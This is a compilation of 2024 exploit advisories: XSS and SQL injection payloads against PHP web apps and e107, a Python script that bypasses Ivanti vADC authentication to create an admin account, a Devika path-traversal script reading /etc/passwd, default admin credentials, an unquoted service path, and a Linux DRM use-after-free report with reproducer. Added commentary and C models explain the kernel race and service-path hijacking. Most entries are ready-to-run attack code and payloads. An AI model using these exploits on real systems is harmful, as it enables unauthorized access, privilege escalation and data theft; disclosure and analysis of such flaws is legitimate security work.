<pre><code>=============================================================================================================================================<br />| # Title : Codeprojects E-Commerce v1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://code-projects.org/?s=Ecommerce |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload : admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"<br /><br />[+] https://www/127.0.0.1/demo/comdept.cmru.ac.th/59143214/admin/includes/profile_modal.php/"onmouseover%3d'prompt(938260)'bad%3d"<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Blog Site 1.0 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/blog-site-using-php_0.zip |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use payload (after login) : index.php?id=&page=http://testaspvulnweb.com/t/xss.html%3f%2500.jpg<br /><br />[+] Panel : http://127.0.0.1/blog/admin/index.php?id=&page=http://testasp.vulnweb.com/t/xss.html%3f%2500.jpg<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>Linux: DRM: refcount incremented too late in drm_file_update_pid()<br /><br />[I am sending this to security@ and to the drm-misc maintainers - based on https://drm.pages.freedesktop.org/maintainer-tools/committer-drm-misc.html#merge-criteria I think this falls into drm-misc's area of responsibility?]<br /><br />=== summary ===<br />drm_file_update_pid() calls get_pid() too late, which creates a race<br />condition that can lead to use-after-free of a `struct pid`.<br /><br />I will send a suggested patch off-list in a minute; let me know if you want me to resend it on the dri-devel list in case that works better for you.<br /><br /><br /><br />=== verbose bug report ===<br />drm_file_update_pid() contains the following code:<br /><br />```<br /> struct drm_device *dev;<br /> struct pid *pid, *old;<br /><br /> /*<br /> * Master nodes need to keep the original ownership in order for<br /> * drm_master_check_perm to keep working correctly. (See comment in<br /> * drm_auth.c.)<br /> */<br /> if (filp->was_master)<br /> return;<br /><br /> pid = task_tgid(current);<br /><br /> [...]<br /><br /> dev = filp->minor->dev;<br /> mutex_lock(&dev->filelist_mutex);<br /> old = rcu_replace_pointer(filp->pid, pid, 1);<br /> mutex_unlock(&dev->filelist_mutex);<br /><br /> if (pid != old) {<br /> get_pid(pid);<br /> synchronize_rcu();<br /> put_pid(old);<br /> }<br />```<br /><br />filp->pid is a refcounted pointer which can only be modified under<br />dev->filelist_mutex.<br />After calling rcu_replace_pointer(), we have a refcount debt of 1, which is<br />still fine because we're holding the mutex that prevents other tasks from<br />taking ownership of the reference stored in filp->pid; but by the time we drop<br />this mutex, we must have called get_pid() to make up for this refcount debt,<br />and that isn't done.<br /><br /><br />So a use-after-free can occur in the following scenario, assuming filp->pid<br />initially points to the pid of process A and process B's 
initial pid refcount<br />is 1:<br /><br /><br />process A                                   process B<br />=========                                   =========<br />                                            begin drm_file_update_pid<br />                                            mutex_lock(&dev->filelist_mutex)<br />                                            rcu_replace_pointer(filp->pid, <pid B>, 1)<br />                                            mutex_unlock(&dev->filelist_mutex)<br />begin drm_file_update_pid<br />mutex_lock(&dev->filelist_mutex)<br />rcu_replace_pointer(filp->pid, <pid A>, 1)<br />mutex_unlock(&dev->filelist_mutex)<br />get_pid(<pid A>)<br />synchronize_rcu()<br />put_pid(<pid B>) *** pid B reaches refcount 0 and is freed here ***<br />                                            get_pid(<pid B>) *** UAF ***<br />                                            synchronize_rcu()<br />                                            put_pid(<pid A>)<br /><br /><br />Note that this race can only occur if RCU is configured so that<br />running in preemptible task context can count as an RCU quiescent state.<br />My testcase assumes that the kernel is configured for full preemption (meaning<br />either CONFIG_PREEMPT=y or CONFIG_PREEMPT_DYNAMIC=y with full preemption<br />selected at boot time); however, I think in theory the bug can probably be<br />hit as long as CONFIG_PREEMPT_RCU=y is enabled (which is the case on kernel<br />builds with dynamic preemption), since I think on such builds, expedited grace<br />periods can still detect RCU quiescent states with IPIs.<br /><br /><br />My reproducer also requires that you patch the following code into the kernel<br />to slow down execution and make the bug easy to trigger:<br /><br />```<br />diff --git a/drivers/gpu/drm/drm_file.c b/drivers/gpu/drm/drm_file.c<br />index 638ffa4444f5..03e7711e9744 100644<br />--- a/drivers/gpu/drm/drm_file.c<br />+++ b/drivers/gpu/drm/drm_file.c<br />@@ -38,6 +38,7 @@<br /> #include <linux/pci.h><br /> #include <linux/poll.h><br /> #include <linux/slab.h><br />+#include <linux/delay.h><br /><br /> #include <drm/drm_client.h><br /> #include <drm/drm_drv.h><br />@@ -472,6 +473,12 @@ void drm_file_update_pid(struct drm_file *filp)<br /> old = rcu_replace_pointer(filp->pid, pid, 1);<br /> mutex_unlock(&dev->filelist_mutex);<br /><br />+ if (strcmp(current->comm, \"SLOWME\") == 0) {<br />+ pr_warn(\"%s: BEGIN DELAY\<br />\", __func__);<br />+ mdelay(1000);<br />+ pr_warn(\"%s: END DELAY\<br />\", __func__);<br />+ }<br />+<br /> if (pid != old) {<br /> get_pid(pid);<br /> synchronize_rcu();<br />```<br /><br /><br />The reproducer code:<br />```<br />#include <unistd.h><br />#include <stdio.h><br />#include <err.h><br />#include <fcntl.h><br />#include <stdlib.h><br />#include <sys/signal.h><br />#include <sys/ioctl.h><br />#include <sys/prctl.h><br />#include <sys/wait.h><br />#include <drm/drm.h><br /><br />#define SYSCHK(x) ({ \<br />  typeof(x) __res = (x); \<br />  if (__res == (typeof(x))-1) \<br />    err(1, "SYSCHK(" #x ")"); \<br />  __res; \<br />})<br /><br />static void main_test_code() {<br />  struct drm_version dummy_version;<br /><br />  int drm_fd = SYSCHK(open("/dev/dri/renderD128", O_RDONLY));<br />  int child = SYSCHK(fork());<br /><br />  if (child == 0) {<br />    /* child process */<br />    prctl(PR_SET_NAME, "SLOWME");<br />    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version); // delay injected here<br />  } else {<br />    /* parent process */<br />    usleep(200*1000);<br />    ioctl(drm_fd, DRM_IOCTL_VERSION, &dummy_version);<br />  }<br /><br />  if (child == 0) {<br />    /* child process */<br />    exit(0);<br />  } else {<br />    /* parent process */<br />    int status = 0;<br />    pid_t child = wait(&status);<br />    printf("wait() returned %d, status %d\n", child, status);<br />    exit(0);<br />  }<br />}<br /><br />int main(void) {<br />  // run in a child process to avoid extra references from job control or such<br />  int child = SYSCHK(fork());<br />  if (child == 0) {<br />    prctl(PR_SET_PDEATHSIG, SIGKILL);<br />    main_test_code();<br />  } else {<br />    int status = 0;<br />    pid_t child = wait(&status);<br />    printf("wait() returned %d, status %d\n", child, status);<br />  }<br />}<br />```<br /><br /><br />The resulting KASAN splat (tested on mainline plus the race widener
patch<br />above, with CONFIG_PREEMPT=y and CONFIG_KASAN=y):<br />```<br /> ==================================================================<br /> BUG: KASAN: slab-use-after-free in drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))<br /> Write of size 4 at addr ffff88811f2f68c0 by task SLOWME/1092<br /><br /> CPU: 3 PID: 1092 Comm: SLOWME Not tainted 6.10.0-rc5-00035-gafcd48134c58-dirty #384<br /> Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.3-debian-1.16.3-2 04/01/2014<br /> Call Trace:<br /> <TASK><br /> dump_stack_lvl (lib/dump_stack.c:117)<br /> print_report (mm/kasan/report.c:378 mm/kasan/report.c:488)<br /> kasan_report (mm/kasan/report.c:603)<br /> kasan_check_range (mm/kasan/generic.c:175 (discriminator 1) mm/kasan/generic.c:189 (discriminator 1))<br /> drm_file_update_pid (./arch/x86/include/asm/atomic.h:93 (discriminator 4) ./include/linux/atomic/atomic-arch-fallback.h:749 (discriminator 4) ./include/linux/atomic/atomic-instrumented.h:253 (discriminator 4) ./include/linux/refcount.h:184 (discriminator 4) ./include/linux/refcount.h:241 (discriminator 4) ./include/linux/refcount.h:258 (discriminator 4) ./include/linux/pid.h:84 (discriminator 4) ./include/linux/pid.h:81 (discriminator 4) drivers/gpu/drm/drm_file.c:483 (discriminator 4))<br /> drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)<br /> drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)<br /> __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)<br /> do_syscall_64 (arch/x86/entry/common.c:52 
(discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))<br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)<br />[...]<br /> </TASK><br /><br /> Allocated by task 1091:<br /> kasan_save_stack (mm/kasan/common.c:48)<br /> kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))<br /> __kasan_slab_alloc (mm/kasan/common.c:312 mm/kasan/common.c:338)<br /> kmem_cache_alloc_noprof (./include/linux/kasan.h:201 mm/slub.c:3940 mm/slub.c:4002 mm/slub.c:4009)<br /> alloc_pid (kernel/pid.c:187)<br /> copy_process (kernel/fork.c:2406)<br /> kernel_clone (./include/linux/random.h:26 kernel/fork.c:2798)<br /> __do_sys_clone (kernel/fork.c:2929)<br /> do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))<br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)<br /><br /> Freed by task 1091:<br /> kasan_save_stack (mm/kasan/common.c:48)<br /> kasan_save_track (./arch/x86/include/asm/current.h:49 (discriminator 1) mm/kasan/common.c:60 (discriminator 1) mm/kasan/common.c:69 (discriminator 1))<br /> kasan_save_free_info (mm/kasan/generic.c:582 (discriminator 1))<br /> poison_slab_object (mm/kasan/common.c:242)<br /> __kasan_slab_free (mm/kasan/common.c:256 (discriminator 1))<br /> kmem_cache_free (mm/slub.c:4438 (discriminator 3) mm/slub.c:4513 (discriminator 3))<br /> put_pid.part.0 (kernel/pid.c:122)<br /> drm_ioctl_kernel (./include/drm/drm_drv.h:510 drivers/gpu/drm/drm_ioctl.c:737)<br /> drm_ioctl (drivers/gpu/drm/drm_ioctl.c:842)<br /> __x64_sys_ioctl (fs/ioctl.c:51 fs/ioctl.c:912 fs/ioctl.c:898 fs/ioctl.c:898)<br /> do_syscall_64 (arch/x86/entry/common.c:52 (discriminator 1) arch/x86/entry/common.c:83 (discriminator 1))<br /> entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:130)<br /><br /> The buggy address belongs to the object at ffff88811f2f68c0<br /> which belongs to the cache pid of 
size 240<br /> The buggy address is located 0 bytes inside of<br /> freed 240-byte region [ffff88811f2f68c0, ffff88811f2f69b0)<br /><br /> The buggy address belongs to the physical page:<br /> page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11f2f6<br /> head: order:1 mapcount:0 entire_mapcount:0 nr_pages_mapped:0 pincount:0<br /> flags: 0x200000000000040(head|node=0|zone=2)<br /> page_type: 0xffffefff(slab)<br /> raw: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000<br /> raw: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000<br /> head: 0200000000000040 ffff888106686a00 dead000000000122 0000000000000000<br /> head: 0000000000000000 0000000080190019 00000001ffffefff 0000000000000000<br /> head: 0200000000000001 ffffea00047cbd81 ffffffffffffffff 0000000000000000<br /> head: 0000000000000002 0000000000000000 00000000ffffffff 0000000000000000<br /> page dumped because: kasan: bad access detected<br /><br /> Memory state around the buggy address:<br /> ffff88811f2f6780: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br /> ffff88811f2f6800: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fc fc<br /> >ffff88811f2f6880: fc fc fc fc fc fc fc fc fa fb fb fb fb fb fb fb<br /> ^<br /> ffff88811f2f6900: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb<br /> ffff88811f2f6980: fb fb fb fb fb fb fc fc fc fc fc fc fc fc fc fc<br /> ==================================================================<br />```<br /><br /><br /><br />=== disclosure deadline ===<br />This bug is subject to a 90-day disclosure deadline. If a fix for this<br />issue is made available to users before the end of the 90-day deadline,<br />this bug report will become public 30 days after the fix was made<br />available. 
Otherwise, this bug report will become public at the deadline.<br />The scheduled deadline is 2024-09-25.<br /><br />For more details, see the Project Zero vulnerability disclosure policy:<br />https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br />Related CVE Numbers: CVE-2024-39486.<br /><br /><br /><br />Found by: jannh@google.com<br /><br /></code></pre>
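Review bot: in the second hunk of the race-widener patch, the SLOWME delay is placed after mutex_unlock() but before the `if (pid != old)` check, so it fires on every ioctl from a task named SLOWME, including the pid == old case in which no reference debt exists; putting the mdelay(1000) inside the `if (pid != old)` branch, directly before get_pid(pid), would confine the widened window to exactly the one the summary describes. mdelay() rather than msleep() is the right primitive here: sleeping would be a context switch and therefore an RCU quiescent state, which would let process A's synchronize_rcu() return even on a kernel without preemptible RCU, whereas the real window contains no sleep, so a busy-wait keeps the reproducer faithful to the CONFIG_PREEMPT_RCU dependency the report points out.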
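The refcount accounting behind the report above, replayed in an added userspace model (example code, not the reporter's code and not kernel code): struct pid, get_pid(), put_pid(), filp->pid and dev->filelist_mutex are stand-ins built from plain counters, RCU is not modelled because the race only needs process A's synchronize_rcu() to return before process B resumes, and the interleaving is the report's own trace, run once with the buggy ordering (get_pid() after mutex_unlock()) and once with the ordering the analysis calls for (get_pid() before the mutex is dropped). The starting refcounts (pid A at 2 for task A plus filp->pid, pid B at 1 for task B alone) are assumptions of the model, chosen to match the "process B's initial pid refcount is 1" premise.

```c
/* Added example (not the reporter's or the kernel's code): replay the
 * drm_file_update_pid() race with plain counters. Assumption: pid A starts at
 * refcount 2 (task A + filp->pid), pid B at 1 (task B only). */
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>

struct pid_obj { int refcount; bool freed; };

struct model {
    struct pid_obj *slot;   /* stands in for filp->pid */
    bool mutex_held;        /* stands in for dev->filelist_mutex */
    int uaf_count;          /* get_pid()/put_pid() calls on a freed object */
    int unlock_with_debt;   /* mutex drops while the slot's reference was unpaid */
};

static void get_pid(struct model *m, struct pid_obj *p)
{
    if (p->freed) { m->uaf_count++; return; }   /* the write KASAN flagged */
    p->refcount++;
}

static void put_pid(struct model *m, struct pid_obj *p)
{
    if (p->freed) { m->uaf_count++; return; }
    if (--p->refcount == 0)
        p->freed = true;                         /* kmem_cache_free() in the kernel */
}

/* One caller of drm_file_update_pid(), advanced one phase at a time so that
 * two callers can be interleaved exactly as in the report's trace. */
struct updater { struct pid_obj *pid, *old; int phase; };

/* Returns false once the caller has run to completion. */
static bool step(struct model *m, struct updater *u, bool fixed)
{
    switch (u->phase++) {
    case 0: /* mutex_lock(&dev->filelist_mutex) */
        if (m->mutex_held) { fputs("model error: lock contended\n", stderr); exit(1); }
        m->mutex_held = true;
        return true;
    case 1: /* old = rcu_replace_pointer(filp->pid, pid, 1) */
        u->old = m->slot;
        m->slot = u->pid;
        return true;
    case 2: /* fixed ordering: pay the reference debt while still holding the mutex */
        if (fixed && u->pid != u->old)
            get_pid(m, u->pid);
        return true;
    case 3: /* mutex_unlock(&dev->filelist_mutex) */
        if (!fixed && u->pid != u->old)
            m->unlock_with_debt++;
        m->mutex_held = false;
        return true;
    case 4: /* buggy ordering: get_pid(pid) only now, after the unlock */
        if (!fixed && u->pid != u->old)
            get_pid(m, u->pid);
        return true;
    default: /* synchronize_rcu(); put_pid(old) */
        if (u->pid != u->old)
            put_pid(m, u->old);
        return false;
    }
}

struct outcome { int uaf_count, unlock_with_debt, ref_a, ref_b; bool b_freed, slot_is_a; };

/* The report's interleaving: B swaps in its pid and drops the mutex, A runs
 * drm_file_update_pid() to completion, then B resumes. */
static struct outcome replay(bool fixed)
{
    struct pid_obj a = { 2, false }, b = { 1, false };
    struct model m = { &a, false, 0, 0 };
    struct updater ua = { &a, NULL, 0 }, ub = { &b, NULL, 0 };

    while (ub.phase < 4) step(&m, &ub, fixed);   /* B: lock, swap, (get), unlock */
    while (step(&m, &ua, fixed)) ;               /* A: whole call; frees pid B when buggy */
    while (step(&m, &ub, fixed)) ;               /* B: get_pid(<pid B>) ... put_pid(<pid A>) */

    struct outcome o = { m.uaf_count, m.unlock_with_debt, a.refcount, b.refcount,
                         b.freed, m.slot == &a };
    return o;
}

static void report(const char *label, struct outcome o)
{
    printf("%s: uaf=%d unlock-with-debt=%d refcount(A)=%d refcount(B)=%d%s\n",
           label, o.uaf_count, o.unlock_with_debt, o.ref_a, o.ref_b,
           o.b_freed ? " (pid B freed)" : "");
}

int main(void)
{
    report("get_pid() after mutex_unlock() ", replay(false));
    report("get_pid() before mutex_unlock()", replay(true));
    return 0;
}
```

The buggy run ends with pid B freed and one access to the freed object, exactly the put_pid()/get_pid() pair in the trace; the fixed run ends with both counters balanced (A back at 2, B at 1) and no mutex release while a reference was owed, which is the invariant the report states: the debt created by rcu_replace_pointer() must be paid before dev->filelist_mutex is dropped.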
<pre><code>[x]========================================================================================================================================[x]<br /> | Title : Online Shopping Portal Project 2.0 SQL Injection Vulnerabilities<br /> | Software : Online Shopping Portal Project<br /> | Created By : https://phpgurukul.com/author/anujk305/<br /> | Version : V 2.0<br /> | Last Updated : 06 June 2024<br /> | Download : https://phpgurukul.com/shopping-portal-free-download/<br /> | Date : 03 August 2024<br /> | Author : OoN_Boy<br />[x]========================================================================================================================================[x]<br /> | Technology : PHP<br /> | Database : MySQL<br /> | Price : FREE<br /> | Description : E-commerce means any transaction over the internet.<br />[x]========================================================================================================================================[x]<br /><br />[O] Exploit<br /> <br /> http://127.0.0.1/shopping/order-details.php [email parameter]<br /> http://127.0.0.1/shopping/order-details.php [orderid parameter]<br /> <br />[O] Proof of concept<br /> <br /> Create an account, order one of the items, then track the order; the order tracking page sends the POST request below.<br /><br /> Save the raw request to a file and pass it to sqlmap:<br /><br /> sqlmap.py -r request.txt -p orderid,email --dbs<br /><br /> [SQL]<br /> POST /shopping/order-details.php HTTP/1.1<br /> Host: 127.0.0.1<br /> Content-Length: 42<br /> Cache-Control: max-age=0<br /> sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126"<br /> sec-ch-ua-mobile: ?0<br /> sec-ch-ua-platform: "Windows"<br /> Accept-Language: en-US<br /> Upgrade-Insecure-Requests: 1<br /> Origin: http://127.0.0.1<br /> Content-Type: application/x-www-form-urlencoded<br /> User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.127 Safari/537.36<br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />
Sec-Fetch-Site: same-origin<br /> Sec-Fetch-Mode: navigate<br /> Sec-Fetch-User: ?1<br /> Sec-Fetch-Dest: document<br /> Referer: http://127.0.0.1/shopping/track-orders.php<br /> Accept-Encoding: gzip, deflate, br<br /> Cookie: auth-token-secret=ce668e880e958286436c06776b331b4b; auth-token=cc6dae05ce833672d48f461769dcd56c; PHPSESSID=qnae9mjoqfs22v54k55e1bt1hh<br /> Connection: keep-alive<br /><br /> orderid=1&email=vrs_hck@maho.id&submit=<br /> <br />[x]========================================================================================================================================[x]<br /><br />[O] Greetz<br /><br />BatamHacker, Vrs-hCk, c0li, h4ntu, Opay, Ndet, Ipay, Paman, NoGe, H312Y, dono, pizzyroot, zxvf, Joe Chawanua, k0rea [Ntc],xx_user, s3t4n, Angela Chang, IrcMafia, str0ke, em|nem, Pandoe, Ronny ^s0n g0ku^<br /><br />[x]========================================================================================================================================[x]<br /></code></pre>
<pre><code># Exploit Title: Blind SQL Injection - dolphinv7.4.2.<br /># Date: 8/2024<br /># Exploit Author: Andrey Stoykov<br /># Version: 7.4.2<br /># Tested on: Ubuntu 22.04<br /># Blog:<br />https://msecureltd.blogspot.com/2024/07/friday-fun-pentest-series-8-dolphinv742.html<br /><br /><br />SQL Injection:<br /><br />Steps to Reproduce:<br /><br />1. Navigate to "Builders" menu<br />2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar<br />3. That is the injection point<br /><br />sqlmap -r request.txt --dbms=mysql -p cat<br /><br />[...]<br />[INFO] the back-end DBMS is MySQL<br />web application technology: PHP 5.4.45, Apache<br />back-end DBMS: MySQL >= 5.0.12<br />[...]<br /><br /></code></pre>
<pre><code># Exploit Title: Ivanti vADC 9.9 - Authentication Bypass<br /># Date: 2024-08-03<br /># Exploit Author: ohnoisploited<br /># Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller<br /># Software Link: https://hubgw.docker.com/r/pulsesecure/vtm<br /># Version: 9.9<br /># Tested on: Linux<br /># Name Changes: Riverbed Stingray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC<br /># Fixed versions: 22.7R2+<br /><br />import requests<br /><br /># Set to target address<br />admin_portal = 'https://192.168.88.130:9090'<br /><br /># User to create<br />new_admin_name = 'newadmin'<br />new_admin_password = 'newadmin1234'<br /><br />requests.packages.urllib3.disable_warnings()<br />session = requests.Session()<br /><br /># Setting 'error' bypasses access control for wizard.fcgi.<br /># wizard.fcgi can load any section in the web interface.<br />params = {'error': 1,<br />          'section': 'Access Management:LocalUsers'}<br /><br /># Create new user request<br /># _form_submitted to bypass CSRF<br />data = {'_form_submitted': 'form',<br />        'create_user': 'Create',<br />        'group': 'admin',<br />        'newusername': new_admin_name,<br />        'password1': new_admin_password,<br />        'password2': new_admin_password}<br /><br /># Post request<br />r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)<br /><br /># View response<br />content = r.content.decode('utf-8')<br />print(content)<br /><br />if r.status_code == 200 and '<title>2<' in content:<br />    print("New user request sent")<br />    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")<br />else:<br />    print("Unable to create new user")<br /><br /></code></pre>
<pre><code>#Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path<br />#Exploit Author : SamAlucard<br />#Exploit Date: 2024-07-31<br />#Vendor : Genexus<br />#Version : Genexus Protection Server 9.7.2.10<br />#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;<br />#Vendor Homepage : https://www.genexus.com/es/<br />#Tested on OS: Windows 10 Pro<br /><br />#Analyze PoC :<br />==============<br /><br />C:\>sc qc protsrvservice<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: protsrvservice<br />        TYPE               : 10  WIN32_OWN_PROCESS<br />        START_TYPE         : 2   AUTO_START<br />        ERROR_CONTROL      : 1   NORMAL<br />        BINARY_PATH_NAME   : C:\Program Files (x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe<br />        LOAD_ORDER_GROUP   :<br />        TAG                : 0<br />        DISPLAY_NAME       : ProtSrvService<br />        DEPENDENCIES       : RPCSS<br />        SERVICE_START_NAME : LocalSystem<br /><br />The binary path contains spaces but is not quoted, and the service starts automatically as LocalSystem. When the Service Control Manager launches it, Windows resolves the unquoted path by trying C:\Program.exe and then C:\Program Files.exe before the intended ProtSrv.exe, so a local user able to create a file at either location gets code execution as SYSTEM on the next service start. On a default installation standard users cannot create files in the root of C:\, so exploitability depends on the actual ACLs of the host.<br /><br /></code></pre>
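Why the unquoted path matters, as an added example (not part of the advisory): the function below applies the executable-resolution rule CreateProcess() uses for an unquoted command line to the BINARY_PATH_NAME shown above and lists the files Windows would try before the real ProtSrv.exe. The sample path is the one from the sc qc output; the buffer limits MAX_CANDIDATES and MAX_PATH_LEN, and the rule of stopping at the first prefix that already names a .exe (for service paths that carry arguments), are assumptions of this example.

```c
/* Added example (not the advisory's code): derive the planting locations for
 * an unquoted Windows service binary path. An unquoted BINARY_PATH_NAME is
 * handed to CreateProcess() as a command line; to locate the executable it
 * tries each prefix that ends before a space with ".exe" appended, stopping at
 * the first file that exists. Every such prefix whose directory a low-privileged
 * user can write to is a hijack candidate. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define MAX_CANDIDATES 8
#define MAX_PATH_LEN   260

/* True if the first len bytes of s end in ".exe", case-insensitively. */
static int ends_with_exe(const char *s, size_t len)
{
    if (len < 4)
        return 0;
    const char *t = s + len - 4;
    return t[0] == '.' && tolower((unsigned char)t[1]) == 'e'
        && tolower((unsigned char)t[2]) == 'x' && tolower((unsigned char)t[3]) == 'e';
}

/* Fills out[] with the paths CreateProcess() would try before the real binary.
 * Returns the candidate count, or -1 if the path is quoted (taken as a whole,
 * so this vector does not apply). Enumeration stops at a prefix that already
 * names a .exe: with arguments appended, the real binary is found there and
 * nothing later is ever tried. */
int unquoted_exe_candidates(const char *path, char out[][MAX_PATH_LEN], int max)
{
    int n = 0;
    if (path[0] == '"')
        return -1;
    for (const char *p = path; *p != '\0' && n < max; p++) {
        if (*p != ' ')
            continue;
        size_t len = (size_t)(p - path);
        if (ends_with_exe(path, len))
            break;
        if (len + sizeof ".exe" > MAX_PATH_LEN)
            break;
        memcpy(out[n], path, len);
        memcpy(out[n] + len, ".exe", sizeof ".exe");   /* copies the NUL too */
        n++;
    }
    return n;
}

/* Constructed input: the BINARY_PATH_NAME from the sc qc output above. */
static const char *const sample_path =
    "C:\\Program Files (x86)\\CommonFiles\\Artech\\GXProt1\\ProtSrv.exe";

int main(void)
{
    char cand[MAX_CANDIDATES][MAX_PATH_LEN];
    int n = unquoted_exe_candidates(sample_path, cand, MAX_CANDIDATES);
    if (n < 0) {
        puts("path is quoted: not reachable through path splitting");
        return 0;
    }
    printf("%d file(s) would be tried before %s\n", n, sample_path);
    for (int i = 0; i < n; i++)
        printf("  %s\n", cand[i]);
    return 0;
}
```

For the path above this yields C:\Program.exe and C:\Program Files.exe; whether either directory is writable by a low-privileged account (icacls on the target) is the remaining check that decides exploitability, and quoting the path in the service configuration removes the vector entirely.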
<pre><code># Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter<br /># Google Dork: N/A<br /># Date: 2024-06-29<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/X)<br /># Vendor Homepage: https://devikaai.co/<br /># Software Link: https://github.com/stitionai/devika<br /># Version: v1<br /># Tested on: Windows 11 Home Edition<br /># CVE: CVE-2024-40422<br /><br />#!/usr/bin/python<br /><br />import argparse<br />import requests<br /><br />def exploit(target_url):<br /> url = f'http://{target_url}/api/get-browser-snapshot'<br /> params = {<br /> 'snapshot_path': '../../../../etc/passwd'<br /> }<br /><br /> response = requests.get(url, params=params)<br /> print(response.text)<br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')<br /> parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)<br /> args = parser.parse_args()<br /><br /> exploit(args.target)<br /> <br /><br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : e107 v2.3.3 XSS Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://unlimited.dl.sourceforge.net/project/e107/e107/e107%20v2.3.3/e107_2.3.3_full.zip?viasf=1 |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Use Payload : /image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1<br /><br />[+] Login : http://127.0.0.1/233/e107_admin/<br /><br />[+] http://127.0.0.1/233/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281986%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>
<pre><code>=============================================================================================================================================<br />| # Title : Codeprojects E-Commerce v1.0 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) |<br />| # Vendor : https://code-projects.org/?s=Ecommerce |<br />=============================================================================================================================================<br /><br />poc :<br /><br />[+] Dorking in Google or another search engine.<br /><br />[+] Insecure Settings : the application appears to leave a default administrative account in place after installation.<br /><br />[+] Use payload : user = admin@admin.com & pass = password<br /><br />[+] https://www/127.0.0.1/demo/comdeptcmru.acth/59143214/admin/products.php<br /><br />Greetings to :============================================================<br />jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |<br />==========================================================================<br /></code></pre>